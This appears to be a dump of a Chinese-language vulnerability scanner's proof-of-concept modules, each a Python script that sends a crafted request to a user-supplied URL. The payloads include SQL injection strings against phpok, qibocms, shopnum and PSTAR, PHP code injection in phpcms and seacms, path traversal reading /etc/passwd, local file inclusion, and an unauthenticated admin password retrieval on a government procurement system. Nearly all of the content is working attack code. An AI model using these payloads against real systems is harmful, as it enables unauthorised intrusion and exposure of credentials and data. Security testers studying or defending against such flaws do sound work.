/pocs/cms/others/zfcgxt_UserSecurityController_getpass.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 某政府采购系统任意用户密码获取漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-076710
6 | author: Lucifer
7 | description: 未授权泄露了用户密码信息可直接登录。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class zfcgxt_UserSecurityController_getpass_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/UserSecurityController.do?method=getPassword&step=2&userName=admin"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.status_code == 200 and r"usrIsExpired" in req.text and r"usrIsLocked" in req.text:
27 | cprint("[+]存在某政府采购系统任意用户密码获取漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = zfcgxt_UserSecurityController_getpass_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/others/zhuofan_downLoadFile_download.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 卓繁cms任意文件下载漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-54074
6 | author: Lucifer
7 | description: 文件/index/downLoadFile.action中,参数filePath存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class zhuofan_downLoadFile_download_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/index/downLoadFile.action?fileName=web.xml&filePath=WEB-INF/web.xml"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"" in req.text:
27 | cprint("[+]存在卓繁cms任意文件下载漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = zhuofan_downLoadFile_download_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/pageadmin/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/pageadmin/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/php168/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/php168/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/phpcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/phpcms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/phpcms/phpcms_product_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms2008 product.php 代码执行
5 | referer: http://www.wooyun.org/bugs/WooYun-2011-02984
6 | author: Lucifer
7 | description: 文件product.php中,参数pagesize存在代码注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class phpcms_product_code_exec_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/yp/product.php?pagesize=${@phpinfo()}"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"Configuration File (php.ini) Path" in req.text:
27 | cprint("[+]存在phpcms2008 product.php 代码执行漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = phpcms_product_code_exec_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/phpmyadmin/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/phpmyadmin/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/phpok/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/phpok/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/phpok/phpok_api_param_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpok api.php SQL注入漏洞
5 | referer: http://www.moonsec.com/post-677.html
6 | author: Lucifer
7 | description: api_control文件存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class phpok_api_param_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/api.php?c=api&f=phpok&id=_total¶m[pid]=42¶m[user_id]=0)UnIOn/**/sElEcT/**/mD5(1234)/**/LIMIT/**/1,1%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在phpok api.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = phpok_api_param_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/phpstudy/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/phpstudy/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/phpstudy/phpstudy_probe.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpstudy探针
5 | referer: unknown
6 | author: Lucifer
7 | description: phpstudy默认存在探针l.php,泄露敏感信息。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class phpstudy_probe_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/l.php"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"phpStudy" in req.text and r"php_version" in req.text:
27 | cprint("[+]存在phpstudy探针...(信息)\tpayload: "+vulnurl, "green")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = phpstudy_probe_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/piaoyou/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/piaoyou/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/piaoyou/piaoyou_int_order_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 票友票务系统int_order.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0127911
6 | author: Lucifer
7 | description: 文件tickets/int_order.aspx中,参数id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class piaoyou_int_order_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/tickets/int_order.aspx?id=1Or/**/1=CoNvErt(InT,ChAr(66)%2BChAr(66)%2BChAr(66)%2b@@VeRsIoN)--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"BBBMicrosoft" in req.text:
27 | cprint("[+]存在票友票务系统int_order.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = piaoyou_int_order_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/pstar/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/pstar/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/pstar/pstar_isfLclInfo_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: PSTAR-电子服务平台SQL注入漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0128182
6 | author: Lucifer
7 | description: 文件/HyperLink/isfLclInfo.aspx?type=A&no=,no参数存在SQL注入漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class pstar_isfLclInfo_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/HyperLink/isfLclInfo.aspx?type=A&no=%27AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在PSTAR-电子服务平台SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = pstar_isfLclInfo_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/pstar/pstar_qcustoms_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: PSTAR-电子服务平台SQL注入漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0128182
6 | author: Lucifer
7 | description: 文件/HyperLink/qcustoms.aspx,no参数存在SQL注入漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class pstar_qcustoms_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/HyperLink/qcustoms.aspx?type=A&no=%27AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在PSTAR-电子服务平台SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = pstar_qcustoms_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/pstar/pstar_warehouse_msg_01_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: PSTAR-电子服务平台SQL注入漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0146263
6 | author: Lucifer
7 | description: 文件/HyperLink/warehouse_msg_01.aspx?type=A&no=,no参数存在SQL注入漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class pstar_warehouse_msg_01_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/HyperLink/warehouse_msg_01.aspx?type=A&no=%27AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在PSTAR-电子服务平台SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = pstar_warehouse_msg_01_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/qibocms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/qibocms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/qibocms/qibocms_s_fids_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: qibocms s.php文件参数fids SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-079938
6 | author: Lucifer
7 | description: 文件/coupon/s.php中,参数fids存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class qibocms_s_fids_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/coupon/s.php?action=search&keyword=11&fid=1&fids[]=0)%20UnIoN%20SeLeCt%20Md5(1234),2,3,4,5,6,7,8,9%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在qibocms s.php文件参数fids SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = qibocms_s_fids_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/ruvar/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/ruvar/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/seacms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/seacms/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/seacms/seacms_search_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: seacms search.php 代码执行
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件search.php中,参数area存在代码执行。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class seacms_search_code_exec_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/search.php?searchtype=5&tid=&area=phpinfo()"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"Configuration File (php.ini) Path" in req.text:
27 | cprint("[+]存在seacms search.php代码注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = seacms_search_code_exec_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/shadowsit/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/shadowsit/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/shadowsit/shadowsit_selector_lfi.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: Shadows-IT selector.php 任意文件包含
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件selector.php中,参数idbase64解码可包含本地文件。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class shadowsit_selector_lfi_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/admin/selector.php?page=dXBsb2FkX2ZpbGU=&op=ZHJhd19jYXRfcGhvdG8=&id=Li4vLi4vaW5kZXgucGhw"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"$DB_site" in req.text:
27 | cprint("[+]存在Shadows-IT selector.php 任意文件包含漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = shadowsit_selector_lfi_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/shop360/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/shop360/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/shop360/shop360_do_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 启博淘店通标准版任意文件遍历漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0148274
6 | author: Lucifer
7 | description: /?mod=goods&do=index&class_id=25,参数do未过滤存在任意文件遍历。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class shop360_do_filedownload_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/?mod=goods&do=../../../../../../../../../etc/passwd%00.jpg&class_id=25"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"root:" in req.text and r"/bin/bash" in req.text:
27 | cprint("[+]存在启博淘店通标准版任意文件遍历漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = shop360_do_filedownload_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/shop7z/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/shop7z/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/shopex/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/shopex/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/shopex/shopex_phpinfo_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: shopex敏感信息泄露
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0100121
6 | author: Lucifer
7 | description: 路径 app/dev/svinfo.php,打开后可看到服务器测评信息及phpinfo等相关敏感信息。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class shopex_phpinfo_disclosure_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
21 | }
22 | payload = "/app/dev/svinfo.php?phpinfo=true"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |
27 | if r"Configuration File (php.ini) Path" in req.text:
28 | cprint("[+]存在shopex敏感信息泄露...(敏感信息)\tpayload: "+vulnurl, "green")
29 |
30 | except:
31 | cprint("[-] "+__file__+"====>连接超时", "cyan")
32 |
33 | if __name__ == "__main__":
34 | warnings.filterwarnings("ignore")
35 | testVuln = shopex_phpinfo_disclosure_BaseVerify(sys.argv[1])
36 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/shopnc/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/shopnc/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/shopnum/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/shopnum/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/shopnum/shopnum_GuidBuyList_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: shopnum1 GuidBuyList.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0118447
6 | author: Lucifer
7 | description: 文件GuidBuyList.aspx中,参数guid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class shopnum_GuidBuyList_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/GuidBuyList.aspx?guid=97dcbadc-9b4f-4ff5-9ffb-17e46e10d66d%27AnD(ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsiOn)%3E0--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"BBBMicrosoft" in req.text:
27 | cprint("[+]存在shopnum1 GuidBuyList.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = shopnum_GuidBuyList_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/shopnum/shopnum_ProductDetail_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: shopnum1 ProductDetail.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0118447
6 | author: Lucifer
7 | description: 文件 /ProductDetail.aspx 中,参数guid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class shopnum_ProductDetail_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/ProductDetail.aspx?guid=6e1c9384-232c-4ee0-ada4-14562136d755%27AnD(ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsiOn)%3E0--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"BBBMicrosoft" in req.text:
27 | cprint("[+]存在shopnum1 ProductDetail.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = shopnum_ProductDetail_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/shopnum/shopnum_ShoppingCart1_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: shopnum ShoppingCart1 SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-118610
6 | author: Lucifer
7 | description: 文件/ShoppingCart1.html中,参数MemLoginID存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class shopnum_ShoppingCart1_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/ShoppingCart1.html?MemLoginID=200200%27AnD(ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsiOn)%3E0--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"BBBMicrosoft" in req.text:
27 | cprint("[+]存在shopnum ShoppingCart1 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |
29 | except:
30 | cprint("[-] "+__file__+"====>连接超时", "cyan")
31 |
32 | if __name__ == "__main__":
33 | warnings.filterwarnings("ignore")
34 | testVuln = shopnum_ShoppingCart1_sqli_BaseVerify(sys.argv[1])
35 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/siteengine/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/siteengine/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/siteserver/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/siteserver/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/smartoa/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/smartoa/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/speedcms/__init__.py:
--------------------------------------------------------------------------------
